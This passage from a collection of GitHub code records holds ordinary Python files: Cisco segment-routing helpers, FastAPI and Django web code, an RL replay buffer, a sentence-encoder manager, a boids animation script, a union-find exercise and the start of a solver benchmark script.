item['preference']\r\n\r\n reqs2 = R(['(.*{}.*)'.format(policy),'candidate_paths',\r\n 'preference',path_index,\r\n 'path_type','dynamic',\r\n 'hops','(?P.*)'])\r\n hops = find([out], reqs2, filter_=False, all_keys=True)\r\n if hops:\r\n hop = hops[0][0]\r\n for value in hop.values():\r\n sid = value.get('sid', '')\r\n labels.append(str(sid))\r\n\r\n if ignore_first_label and len(labels):\r\n labels.pop(0)\r\n return labels\r\n\r\n\r\ndef get_segment_routing_policy_in_state(device, expected_admin='up', expected_oper='up',\\\r\n expected_color='', expected_endpoint=''):\r\n \"\"\" Find a segement-routing policy in expected state\r\n\r\n Args:\r\n device ('obj'): Device object\r\n expected_admin ('str'): Expected admin state\r\n expected_oper ('str'): Expected operational state\r\n expected_color (`str`): Expected color\r\n expected_endpoint (`str`): Expected end-point address\r\n Returns:\r\n policy ('str'): Policy name\r\n \"\"\"\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n try:\r\n out = device.parse(cmd)\r\n except Exception as e:\r\n log.error(\"Failed to parse '{cmd}': {e}\".format(cmd=cmd, e=e))\r\n return None\r\n\r\n for policy in out.keys():\r\n admin = out.get(policy, {}).get('status', {}).get('admin', '')\r\n oper = out.get(policy, {}).get('status', {}).\\\r\n get('operational', {}).get('state', '')\r\n color = str(out.get(policy, {}).get('color', ''))\r\n endpoint = out.get(policy, {}).get('end_point', '')\r\n\r\n if (admin.lower() == expected_admin.lower() and \r\n oper.lower() == expected_oper.lower() and \r\n color == expected_color and \r\n endpoint == expected_endpoint):\r\n return policy\r\n else:\r\n log.info(\"Failed to find a policy with admin state {admin} \"\r\n \"and oper state {oper}\".format(admin=expected_admin,\r\n oper=expected_oper))\r\n return None\r\n\r\n\r\ndef get_segment_routing_sid_map_configuration(device, address_family=\"ipv4\"):\r\n \"\"\" Get Segment routing SID map configuration\r\n\r\n Args:\r\n device ('str'): Device str\r\n address_family ('str'): Address family\r\n Returns:\r\n Dictionary with ip address as key and sid as value\r\n ex.)\r\n {\r\n '192.168.1.1': '1',\r\n '192.168.1.2': '2'\r\n }\r\n \"\"\"\r\n out = get_running_config_section_dict(\r\n device=device, section=\"segment-routing\"\r\n )\r\n\r\n sid_dict = {}\r\n\r\n if not out:\r\n return None\r\n\r\n p1 = re.compile(r\"^(?P\\S+) index (?P\\d+) range \\d+$\")\r\n\r\n connected_prefix_sid_maps = out[\"segment-routing mpls\"][\r\n \"connected-prefix-sid-map\"\r\n ][\"address-family {}\".format(address_family)].keys()\r\n\r\n for key in connected_prefix_sid_maps:\r\n key = key.strip()\r\n m = p1.match(key)\r\n if m:\r\n group = m.groupdict()\r\n sid_dict.update({group[\"ip_address\"]: group[\"sid\"]})\r\n continue\r\n\r\n return sid_dict\r\n\r\n\r\ndef get_segment_routing_lb_range(device):\r\n \"\"\" Gets segement-routing local block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls lb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\n\r\ndef get_segment_routing_gb_range(device):\r\n \"\"\" Gets segement-routing global block range\r\n\r\n Args:\r\n device ('obj'): device to use\r\n\r\n Returns:\r\n ('int', 'int'): label_min, label_max\r\n\r\n Raises:\r\n None\r\n \"\"\"\r\n try:\r\n out = device.parse(\"show segment-routing mpls gb\")\r\n except SchemaEmptyParserError:\r\n return None, None\r\n\r\n return out.get(\"label_min\"), out.get(\"label_max\")\r\n\r\ndef get_segment_routing_accumulated_path_metric(device, preference, policy_name=None):\r\n \"\"\" Get accumulated path metric for a preference path\r\n\r\n Args:\r\n device ('obj'): Device to use\r\n policy_name ('str'): Policy name to verify. If not specified will verify all\r\n preference ('int'): Preference path\r\n\r\n Returns:\r\n accumulated_metric (None, 'int'): Accumulated path metric\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n if policy_name:\r\n cmd = 'show segment-routing traffic-eng policy name {policy}'.format(policy=policy_name)\r\n else:\r\n cmd = 'show segment-routing traffic-eng policy all'\r\n \r\n try:\r\n out = device.parse(cmd)\r\n except SchemaEmptyParserError:\r\n return None\r\n \r\n for policy in out:\r\n for preference_found in out[policy].get('candidate_paths', {}).get('preference', {}):\r\n if preference != preference_found:\r\n continue\r\n if out[policy]['candidate_paths']['preference'][preference].get('path_type'):\r\n path_type_dict = out[policy]['candidate_paths']['preference'][preference]['path_type']\r\n if 'dynamic' in path_type_dict:\r\n accumulated_metric = path_type_dict['dynamic'].get('path_accumulated_metric', '')\r\n return accumulated_metric\r\n return None\r\n\r\ndef get_segment_routing_labels_from_bgp(device, route, vrf, best_path=False):\r\n \"\"\" Gets segement-routing labels from bgp table\r\n\r\n Args:\r\n device (`obj`): device to use\r\n route (`str`): route to check\r\n vrf (`vrf`): VRF name\r\n best_path (`bool`): only best path returned\r\n\r\n Returns:\r\n ('list'): list of segment routing labels\r\n\r\n Raises:\r\n N/A\r\n \"\"\"\r\n\r\n # search destination's endpoint and color by \r\n # show ip bgp vpnv4 vrf \r\n\r\n endpoint_color_list = device.api.get_ip_bgp_route_nexthop_color(\r\n address_family='vpnv4', route=route, vrf=vrf, best_path=True)\r\n \r\n # get policy names based on endpoint and color\r\n policy_list = []\r\n label_list = []\r\n if endpoint_color_list:\r\n log.info('Found endpoint and color: {}'.format(\r\n endpoint_color_list))\r\n for endpoint, color in endpoint_color_list:\r\n policy = device.api.get_segment_routing_policy_in_state(\r\n expected_admin='up', expected_oper='up',\r\n expected_color=color, expected_endpoint=endpoint)\r\n # don't have redundant policy\r\n if policy not in policy_list:\r\n policy_list.append(policy)\r\n if policy_list:\r\n log.info('Policy Found: {}'.format(policy_list))\r\n for policy in policy_list:\r\n label_list = device.api.\\\r\n get_segment_routing_policy_active_path_hop_labels(\r\n policy=policy, ignore_first_label=True)\r\n\r\n return label_list\r\n","repo_name":"CiscoTestAutomation/genielibs","sub_path":"pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/segment_routing/get.py","file_name":"get.py","file_ext":"py","file_size_in_byte":10585,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"16"}
+{"seq_id":"14500229895","text":"\"\"\"\nItem routes\n\"\"\"\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom sqlalchemy.orm import Session\n\nfrom app.schemas.item import ItemSchema, ItemCreateSchema, ItemUpdateSchema\nfrom app.api.v1.dependencies import get_db\nfrom app.crud import item as crud\n\n\nrouter = APIRouter()\n\n\n@router.get('/', response_model=list[ItemSchema])\ndef read_all(db: Session = Depends(get_db)):\n \"\"\"Read items\"\"\"\n return crud.get_items(db)\n\n\n@router.get('/{item_id}', response_model=ItemSchema)\ndef read_one(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Get item by id\"\"\"\n item = crud.get_item_by_id(item_id=item_id, db=db)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.put('/{item_id}', response_model=ItemSchema)\ndef update(item_id: int, item: ItemUpdateSchema, db: Session = Depends(get_db)):\n \"\"\"Update item\"\"\"\n item = crud.update_item(db, item_id, item)\n if item is None:\n raise HTTPException(status_code=404)\n else:\n return item\n\n\n@router.post('/', response_model=ItemSchema)\ndef create(item: ItemCreateSchema, db: Session = Depends(get_db)):\n \"\"\"Create new item\"\"\"\n return crud.create_item(db, item)\n\n\n@router.delete('/{item_id}')\ndef delete(item_id: int, db: Session = Depends(get_db)):\n \"\"\"Delete item\"\"\"\n response = crud.disable_item(db, item_id)\n if response is None:\n raise HTTPException(status_code=404)\n","repo_name":"beerman17/dragonroll-gameserver","sub_path":"app/api/v1/endpoints/items.py","file_name":"items.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"6067989024","text":"import json\nimport logging\nimport os\nimport numpy as np\n\nfrom gym.utils import atomic_write\nfrom rltf.utils import rltf_conf\nfrom rltf.utils import seeding\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BaseBuffer():\n \"\"\"Abstract buffer that saves agent experience. Supports both image and low-dimensional observations.\n Very memory efficient implementation in the case of images.\"\"\"\n\n def __init__(self, size, state_shape, obs_dtype, act_shape, act_dtype, obs_len):\n \"\"\"\n Args:\n state_shape: tuple or list. Shape of what is consedered to be a single state (not observation).\n For example, for DQN this should be `[84, 84, 4]` because a state is comprised of the last 4\n frames (observations).\n obs_dtype: np.dtype. Type of the observation data\n act_shape: tuple or list. Shape of the action space\n act_dtype: np.dtype. Type of the action data\n obs_len: int, `>= 1`. The number of observations that comprise a state. If `obs_len=1`,\n then `obs_shape == state_shape`. Must equal 1 for low-dimensional observations.\n If `obs_len>=1`, then observations must be images. In this case, states are comprised of\n stacked consecutive observations (images) and `obs_shape[-1] == state_shape[-1] / obs_len`.\n In this case the buffer stores observations separately and automatically reconstructs the\n full states when queried. Corresponds to the order of the MDP.\n \"\"\"\n\n # Compute the observation shape\n obs_shape = self._get_obs_shape(state_shape, obs_len, obs_dtype)\n\n self.obs_shape = list(obs_shape) # observation shape (NOT state shape!)\n self.act_shape = list(act_shape)\n self.obs_len = obs_len\n\n self.max_size = int(size)\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n # Create the buffers\n self.obs = np.empty([self.max_size] + self.obs_shape, dtype=obs_dtype)\n self.action = np.empty([self.max_size] + self.act_shape, dtype=act_dtype)\n self.reward = np.empty([self.max_size], dtype=np.float32)\n self.done = np.empty([self.max_size], dtype=np.bool)\n\n self.prng = seeding.get_prng()\n\n\n @staticmethod\n def _get_obs_shape(state_shape, obs_len, obs_dtype):\n \"\"\"Compute the shape of a single observation (not state)\"\"\"\n\n assert isinstance(obs_len, int) and obs_len >= 1\n\n # Only image observations support stacking observations\n if obs_len > 1:\n assert len(state_shape) == 3\n # Make sure that the type of the observation is np.uint8 for images\n if len(state_shape) == 3:\n assert obs_dtype == np.uint8\n\n # Images assume that the last dimension of the shape is the channel dimension\n if obs_len > 1 and len(state_shape) == 3:\n assert state_shape[-1] % obs_len == 0\n obs_shape = list(state_shape)\n obs_shape[-1] = int(obs_shape[-1]/obs_len)\n else:\n obs_shape = state_shape\n\n return obs_shape\n\n\n def store(self, obs_t, act_t, rew_tp1, done_tp1):\n \"\"\"Store an observed transition. If `obs_len>1`, the next call to this function must be with\n the observation after taking `act_t`, otherwise, reconstructed state will be incorrect.\n If `done_tp1 == True`, then `store()` should not be called with `obs_tp1`, since the agent\n does not need it for computing the return\n Args:\n obs_t: `np.array`, of shape `state_shape`. If `obs_len>1`, the observation is automatically\n extracted and stored instead of storing duplicate data.\n act_t: `np.array`, of shape `act_shape` or `float`. Action taken when `obs_t` was observed\n reward_tp1: `float`. Reward obtained on executing `act_t` in state `obs_t`\n done_tp1: `bool`. True if episode terminated on executing `act_t` in state `obs_t`.\n \"\"\"\n\n # To avoid storing the same data several times, if obs_len > 1, then store only the last\n # observation from the stack of observations that comprise a state\n if self.obs_len > 1:\n self.obs[self.next_idx] = obs_t[:, :, -self.obs_shape[-1]:]\n else:\n self.obs[self.next_idx] = obs_t\n\n self.action[self.next_idx] = act_t\n self.reward[self.next_idx] = rew_tp1\n self.done[self.next_idx] = done_tp1\n\n self.next_idx = (self.next_idx + 1) % self.max_size\n self.size_now = min(self.max_size, self.size_now + 1)\n\n\n def _encode_img_observation(self, idx):\n \"\"\"Encode the observation for idx by stacking the `obs_len` preceding frames together.\n Assume there are more than `obs_len` frames in the buffer.\n NOTE: Used only for image observations\n \"\"\"\n hi = idx + 1 # make noninclusive\n lo = hi - self.obs_len\n\n for i in range(lo, hi - 1):\n if self.done[i % self.max_size]:\n lo = i + 1\n missing = self.obs_len - (hi - lo)\n\n # We need to duplicate the lo observation\n if missing > 0:\n frames = [self.obs[lo % self.max_size] for _ in range(missing)]\n for i in range(lo, hi):\n frames.append(self.obs[i % self.max_size])\n return np.concatenate(frames, 2)\n # We are on the boundary of the buffer\n elif lo < 0:\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n frames = [self.obs[lo:], self.obs[:hi]]\n frames = np.concatenate(frames, 0)\n return frames.transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n # The standard case\n else:\n # This optimization can save about 30% compute time\n img_h, img_w = self.obs.shape[1], self.obs.shape[2]\n return self.obs[lo:hi].transpose(1, 2, 0, 3).reshape(img_h, img_w, -1)\n\n\n def sample(self, batch_size):\n raise NotImplementedError()\n\n\n def new_data(self, batch_size=32):\n \"\"\"Yields the new data which was stored since the last call to this function.\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def all_data(self, batch_size=32):\n \"\"\"Yields all data in the buffer\n Args:\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def recent_data(self, size, batch_size=32):\n \"\"\"Yields the most recent `size` number of examples in the buffer\n Args:\n size: int. Total number of data points to generate\n batch_size: int. Size of a single yielded batch. Can be smaller than specified if not enough data\n Returns:\n python generator which should be iterated; has the same signature as `sample()`\n \"\"\"\n raise NotImplementedError()\n\n\n def save(self, model_dir):\n \"\"\"Store the data to disk\n Args:\n model_dir: Full path of the directory to save the buffer\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n # Create symlink to store buffer if $RLTFBUF is defined\n if 'RLTFBUF' in os.environ:\n # split = os.path.split(os.path.normpath(model_dir))\n # envdir = split[1]\n # model = os.path.split(split[0])\n # store_dir = os.path.join(os.environ['RLTFBUF'], os.path.join(model, envdir))\n mdir = os.path.relpath(model_dir, rltf_conf.MODELS_DIR)\n store_dir = os.path.join(os.environ['RLTFBUF'], mdir)\n\n store_dir = os.path.join(store_dir, \"buffer\")\n if not os.path.exists(store_dir):\n os.makedirs(store_dir)\n os.symlink(store_dir, save_dir)\n # Store the buffer directly in the folder\n else:\n os.makedirs(save_dir)\n\n np.save(os.path.join(save_dir, \"obs.npy\"), self.obs[:self.size_now])\n np.save(os.path.join(save_dir, \"act.npy\"), self.action[:self.size_now])\n np.save(os.path.join(save_dir, \"rew.npy\"), self.reward[:self.size_now])\n np.save(os.path.join(save_dir, \"done.npy\"), self.done[:self.size_now])\n\n data = {\n \"size_now\": self.size_now,\n \"next_idx\": self.next_idx,\n # \"new_idx\": self.new_idx,\n }\n\n with atomic_write.atomic_write(state_file) as f:\n json.dump(data, f, indent=4, sort_keys=True)\n\n\n def restore(self, model_dir):\n \"\"\"Populate the buffer from data previously saved to disk\n Args:\n model_dir: Full path of the directory of the data\n \"\"\"\n save_dir = os.path.join(model_dir, \"buffer\")\n state_file = os.path.join(save_dir, \"state.json\")\n\n if not os.path.exists(save_dir):\n return logger.warning(\"BaseBuffer not saved and cannot resume. Continuing with empty buffer.\")\n\n with open(state_file, 'r') as f:\n data = json.load(f)\n\n self.size_now = data[\"size_now\"]\n self.next_idx = data[\"next_idx\"]\n # self.new_idx = data[\"new_idx\"]\n\n obs = np.load(os.path.join(save_dir, \"obs.npy\"))\n action = np.load(os.path.join(save_dir, \"act.npy\"))\n done = np.load(os.path.join(save_dir, \"done.npy\"))\n reward = np.load(os.path.join(save_dir, \"rew.npy\"))\n\n assert len(obs) == len(action) == len(reward) == len(done) == self.size_now\n assert self.obs.shape[1:] == obs.shape[1:]\n assert self.action.shape[1:] == action.shape[1:]\n assert self.reward.shape[1:] == reward.shape[1:]\n assert self.done.shape[1:] == done.shape[1:]\n\n self.obs[:self.size_now] = obs\n self.action[:self.size_now] = action\n self.reward[:self.size_now] = reward\n self.done[:self.size_now] = done\n\n\n def _sample_n_unique(self, n, lo, hi, exclude=None):\n \"\"\"Sample n unique indices in the range [lo, hi), making sure no sample appreas in `exclude`\n Args:\n n: int. Number of samples to take\n lo: int. Lower boundary of the sample range; inclusive\n hi: int. Upper boundary of the sample range; exclusive\n exclude: list or np.array. Contains values that samples must not take\n Returns:\n np.array of the sampled indices\n \"\"\"\n\n batch = np.empty(n, dtype=np.uint32)\n k = 0\n\n while k < n:\n samples = self.prng.randint(lo, hi, n-k)\n # Get only the unique entries\n samples = np.unique(samples)\n # Get only the entries which are not in exclude\n if exclude is not None:\n valid = np.all(samples[:, None] != exclude, axis=-1)\n samples = samples[valid]\n # Update batch\n end = min(k + samples.shape[0], n)\n batch[k:end] = samples\n k = end\n\n return batch\n\n\n def reset(self):\n self.size_now = 0\n self.next_idx = 0\n # self.new_idx = 0\n\n\n @property\n def size(self):\n return self.max_size\n\n\n def __len__(self):\n return self.size_now\n","repo_name":"nikonikolov/rltf","sub_path":"rltf/memory/base_buffer.py","file_name":"base_buffer.py","file_ext":"py","file_size_in_byte":10664,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"16"}
+{"seq_id":"7421855452","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\n\nimport s2v_encoder\n\nFLAGS = tf.flags.FLAGS\n\n\nclass EncoderManager(object):\n \"\"\"Manager class for loading and encoding with skip-thoughts models.\"\"\"\n\n def __init__(self):\n self.encoders = []\n self.sessions = []\n\n def load_model(self, model_config):\n \"\"\"Loads a skip-thoughts model.\n\n Args:\n model_config: Object containing parameters for building the model.\n vocabulary_file: Path to vocabulary file containing a list of newline-\n separated words where the word id is the corresponding 0-based index in\n the file.\n embedding_matrix_file: Path to a serialized numpy array of shape\n [vocab_size, embedding_dim].\n checkpoint_path: SkipThoughtsModel checkpoint file or a directory\n containing a checkpoint file.\n \"\"\"\n\n g = tf.Graph()\n with g.as_default():\n encoder = s2v_encoder.s2v_encoder(model_config)\n restore_model = encoder.build_graph_from_config(model_config)\n\n sess = tf.Session(graph=g)\n\n restore_model(sess)\n\n self.encoders.append(encoder)\n self.sessions.append(sess)\n\n def encode(self,\n data,\n use_norm=True,\n verbose=False,\n batch_size=128,\n use_eos=False):\n \"\"\"Encodes a sequence of sentences as skip-thought vectors.\n\n Args:\n data: A list of input strings.\n use_norm: If True, normalize output skip-thought vectors to unit L2 norm.\n verbose: Whether to log every batch.\n batch_size: Batch size for the RNN encoders.\n use_eos: If True, append the end-of-sentence word to each input sentence.\n\n Returns:\n thought_vectors: A list of numpy arrays corresponding to 'data'.\n\n Raises:\n ValueError: If called before calling load_encoder.\n \"\"\"\n if not self.encoders:\n raise ValueError(\n \"Must call load_model at least once before calling encode.\")\n\n encoded = []\n for encoder, sess in zip(self.encoders, self.sessions):\n encoded.append(\n np.array(\n encoder.encode(\n sess,\n data,\n use_norm=use_norm,\n verbose=verbose,\n batch_size=batch_size,\n use_eos=use_eos)))\n\n return np.concatenate(encoded, axis=1)\n\n def close(self):\n \"\"\"Closes the active TensorFlow Sessions.\"\"\"\n for sess in self.sessions:\n sess.close()\n","repo_name":"lajanugen/S2V","sub_path":"src/encoder_manager.py","file_name":"encoder_manager.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":205,"dataset":"github-code","pt":"16"}
+{"seq_id":"7130006501","text":"#!/usr/bin/env python3\n\n\"\"\"\nScript to produce visualisation of boid movement from dumped position data\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport configparser, csv, numpy as np, os, sys\n\nfrom fast_boids import quick_norm\n\nfrom boids import *\n\nif len(sys.argv) < 2:\n path = '.'\nelse:\n path = sys.argv[1]\n\nconfig = configparser.ConfigParser()\nif os.path.isdir(path):\n config.read(os.path.join(path, 'config.ini'))\n config['DEFAULT']['data_dir'] = os.path.abspath(path)\nelse:\n config.read(path)\n config['DEFAULT']['data_dir'] = os.path.abspath(os.path.dirname(path))\n\nWORLD_RADIUS = eval(config['DEFAULT']['world_radius'])\nDUMP_STATS_INTERVAL = eval(config['DEFAULT']['dump_stats_interval'])\nDT = eval(config['DEFAULT']['dt'])\n\nPREY_RADIUS = eval(config['Prey']['boid_radius'])\nPREDATOR_RADIUS = eval(config['Predator']['boid_radius'])\n\nFRAME_INTERVAL = eval(config['Visualisation']['frame_interval'])\nEVERY_NTH_FRAME = eval(config['Visualisation']['every_nth_frame'])\nSTART_AT_T = eval(config['Visualisation']['start_at_t'])\nSTOP_AT_T = eval(config['Visualisation']['stop_at_t'])\n\nDATA_DIR = config['DEFAULT']['data_dir']\n\nPLOT_MINIMUM = -1.01*WORLD_RADIUS\nPLOT_MAXIMUM = 1.01*WORLD_RADIUS\n\nfeeding_area_helper = FeedingAreaConfigurations()\nfeeding_area_config = eval(config['DEFAULT']['feeding_areas'])\nif isinstance(feeding_area_config, tuple):\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_config\nelse:\n FEEDING_AREA_LOCATIONS, FEEDING_AREA_RADIUS = feeding_area_helper.get_info(\n feeding_area_config)\n\ndef animate(i, fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data):\n text.set_text(\"t = %d\" % (i*(DUMP_STATS_INTERVAL*DT*EVERY_NTH_FRAME)\n + START_AT_T))\n u = [u[0]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in prey_vel_data[i]]\n prey_quivers.set_offsets(prey_pos_data[i])\n prey_quivers.set_UVC(u, v)\n prey_graph.set_offsets(prey_pos_data[i])\n u = [u[0]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n v = [u[1]/quick_norm(np.array(u)) for u in predator_vel_data[i]]\n predator_quivers.set_offsets(predator_pos_data[i])\n predator_quivers.set_UVC(u, v)\n predator_graph.set_offsets(predator_pos_data[i])\n return [text, prey_graph, predator_graph]\n\ndef collect_data(csv_reader):\n frame_data = []\n i = 0\n for row in csv_reader:\n if i % EVERY_NTH_FRAME:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT < START_AT_T:\n i += 1\n continue\n if i*DUMP_STATS_INTERVAL*DT > STOP_AT_T:\n break\n positions = np.array(list(map(lambda x: float(x), row)))\n num_boids = positions.size / 2\n positions = positions.reshape(num_boids, 2)\n data = []\n for boid in positions:\n data.append((boid[0], boid[1]))\n frame_data.append(data)\n i += 1\n return frame_data\n\nprey_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_positions.csv')))\nprey_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'prey_velocities.csv')))\npredator_pos_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_positions.csv')))\npredator_vel_reader = csv.reader(open(os.path.join(DATA_DIR, 'predator_velocities.csv')))\n\nprey_pos_data = collect_data(prey_pos_reader)\nprey_vel_data = collect_data(prey_vel_reader)\npredator_pos_data = collect_data(predator_pos_reader)\npredator_vel_data = collect_data(predator_vel_reader)\n\nfig, ax = plt.subplots()\nboundary = plt.Circle((0, 0), WORLD_RADIUS, facecolor='none',\n linestyle='dashed')\nax.add_artist(boundary)\n\nfor location in FEEDING_AREA_LOCATIONS:\n feeding_plot = plt.Circle(tuple(location), FEEDING_AREA_RADIUS, facecolor='green', linestyle='dashed', alpha=0.3)\n ax.add_artist(feeding_plot)\n\ntext = ax.text(PLOT_MINIMUM+5, PLOT_MAXIMUM-20, \"\", withdash=True, fontsize=12)\n\nprey_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREY_RADIUS**2, facecolor='white', alpha=0.8,\n edgecolor='black', linewidth=1)\nprey_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\npredator_graph = ax.scatter(100*PLOT_MINIMUM, 100*PLOT_MAXIMUM,\n 1.2*np.pi*PREDATOR_RADIUS**2, facecolor='red', alpha=0.8,\n edgecolor='black', linewidth=1)\npredator_quivers = ax.quiver([], [], width=0.5, units='dots', scale=0.08)\nax.set_xlim(PLOT_MINIMUM, PLOT_MAXIMUM)\nax.set_ylim(PLOT_MINIMUM, PLOT_MAXIMUM)\n\nani = animation.FuncAnimation(fig, animate, len(prey_pos_data),\n fargs=(fig, ax, text,\n prey_graph, prey_quivers,\n predator_graph, predator_quivers,\n prey_pos_data, prey_vel_data,\n predator_pos_data, predator_vel_data),\n interval=FRAME_INTERVAL,\n repeat=True)\nplt.show()\n\n","repo_name":"tsmithe/adaptive-boids","sub_path":"visualise.py","file_name":"visualise.py","file_ext":"py","file_size_in_byte":5236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"12036601375","text":"from django import forms\nfrom .models import Blog\n\n\nclass BlogForm(forms.ModelForm):\n class Meta:\n model = Blog\n fields = ('title', 'description', 'blog_pic')\n widgets = {\n\n 'title': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Title'}),\n 'description': forms.TextInput(attrs={'class': 'form-control row mb-3', 'placeholder': 'Description'})\n\n\n }\n\n labels = {\"title\": \"Title\", \"description\": \"Description\",\n 'blog_pic': 'Profile Picture'}\n","repo_name":"FatihG34/Second_Django_Project","sub_path":"blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38098136446","text":"from django.conf.urls import patterns, include, url\nfrom django.conf.urls.i18n import i18n_patterns\nfrom django.utils.translation import ugettext_lazy as _\nfrom sitemaps import ViewSitemap\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nsitemaps = {\n 'views_sitemap': ViewSitemap,\n}\n\nurlpatterns = patterns('',\n# url(r'^404$', 'info.views.page_not_found', name='page_not_found'),\n # Translation\n (r'^i18n/', include('django.conf.urls.i18n')),\n (r'^sitemap\\.xml$', 'django.contrib.sitemaps.views.sitemap', {\n 'sitemaps': sitemaps,\n 'template_name': 'info/custom_sitemap.html'},),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n url(r'^admin/', include(admin.site.urls)),\n\n # Albums\n url(_(r'^albums$'), 'info.views.albums', name='albums'),\n\n # Facebook all auth\n (r'^accounts/', include('allauth.urls')),\n\n)\n\nurlpatterns += i18n_patterns('',\n url(_(r'^$'), 'info.views.home', name='home'),\n url(_(r'^bicycle-touring$'), 'info.views.bicycle_touring', name='bicycle-touring'),\n url(_(r'^boom-festival$'), 'info.views.boom_festival', name='boom-festival'),\n url(_(r'^boom-and-bike$'), 'info.views.boom_and_bike', name='boom-and-bike'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^together$'), 'info.views.together', name='together'),\n url(_(r'^get-there$'), 'info.views.get_there', name='get-there'),\n url(_(r'^city_visit/(?P.+)$'), 'info.views.city_visit', name='city_visit'),\n url(_(r'^user_checkpoints/(?P[0-9]+)$'), 'info.views.user_checkpoints', name='user_checkpoints'),\n)\n\n#urlpatterns += patterns('django.contrib.auth.views',\n# (_(r'^accounts/login/$'), 'login'),\n# (_(r'^accounts/logout/$'), 'logout'),\n#)\n\nhandler404 = 'info.views.page_not_found'\n","repo_name":"qcaron/boombike","sub_path":"boombike/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"71742442889","text":"def find(parent, x):\n if parent[x] != x:\n parent[x] = find(parent, parent[x])\n return parent[x]\n\n\ndef union(parent, a, b):\n a = find(parent, a)\n b = find(parent, b)\n\n if a < b:\n parent[b] = a\n else:\n parent[a] = b\n\nn ,m = map(int, input().split())\noperations = []\nparent = [i for i in range(m+1)]\n\nfor _ in range(m):\n oper, a, b = map(int, input().split())\n operations.append((oper, a, b))\n\n\nfor operation in operations:\n oper, a, b = operation\n if oper == 0:\n union(parent, a, b)\n if oper == 1:\n if find(parent, a) == find(parent, b):\n print(\"YES\")\n else:\n print(\"NO\")\n \n\n# 7 8\n# 0 1 3\n# 1 1 7\n# 0 7 6\n# 1 7 1\n# 0 3 7\n# 0 4 2\n# 0 1 1\n# 1 1 1","repo_name":"rbgksqkr/TIL","sub_path":"이코테/8. 그래프/ex_make_team.py","file_name":"ex_make_team.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"29910852538","text":"import argparse\n\nimport pandas as pd\nimport os\nimport subprocess\n\n\ndef run_one_run(mesh_size: int):\n bin_file = os.path.dirname(os.path.abspath(__file__)) + \"/../bin/cfdARCO\"\n\n time_microseconds_cudas = []\n time_microseconds_parallels = []\n\n for q in range(5):\n command_cuda = [bin_file, \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\", \"-c\"]\n result_cuda = subprocess.run(command_cuda, capture_output=True, text=True)\n outs_cuda = result_cuda.stdout\n\n time_str_cuda = outs_cuda.split(\"\\n\")[-2].split(\" \")[-1].split(\"[\")[0]\n time_microseconds_cuda = int(time_str_cuda)\n time_microseconds_cudas.append(time_microseconds_cuda)\n\n for q in range(5):\n # command_parallel = [\"mpirun\", \"-n\", \"8\", bin_file, \"--skip_history\", \"-L\", str(mesh_size), \"-d\", \"ln\", \"-t\", \"300\"]\n # result_parallel = subprocess.run(command_parallel, capture_output=True, text=True)\n # outs_parallel = 